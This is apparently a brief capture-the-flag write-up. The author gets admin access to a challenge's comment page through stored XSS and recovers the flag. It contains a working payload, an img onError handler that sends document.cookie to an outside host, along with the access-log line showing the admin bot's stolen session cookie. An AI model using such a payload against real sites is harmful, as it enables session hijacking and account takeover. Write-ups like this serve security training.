So, we are on a page to leave comments on the site, and the goal is to log in as admin. Let me think... I can bet it's an XSS exploit, but let do some search.



We found that there is at least two more pages : admin.php and login.php.



We're trying an easy payload for XSS on the comments section :

< img src="bla" onError="window.location = 'http://blakl.is/'+document.cookie;"></ img>


And, bingo! I receive a cookie from a PhantomJS user in  webserver my access.log :

213.233.185.27 - - [05/Feb/2016:14:36:46 +0000] "GET /PHPSESSID=515386866780b5f132fc96c02b3ddb82 HTTP/1.1" 404 492 "http://172.17.118.91:8083/privateindex.php?id=sec0d" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.0 Safari/534.34"


Just use this cookie and browse admin.php to have the flag : dcfda075814e72c8a206e115914fd50b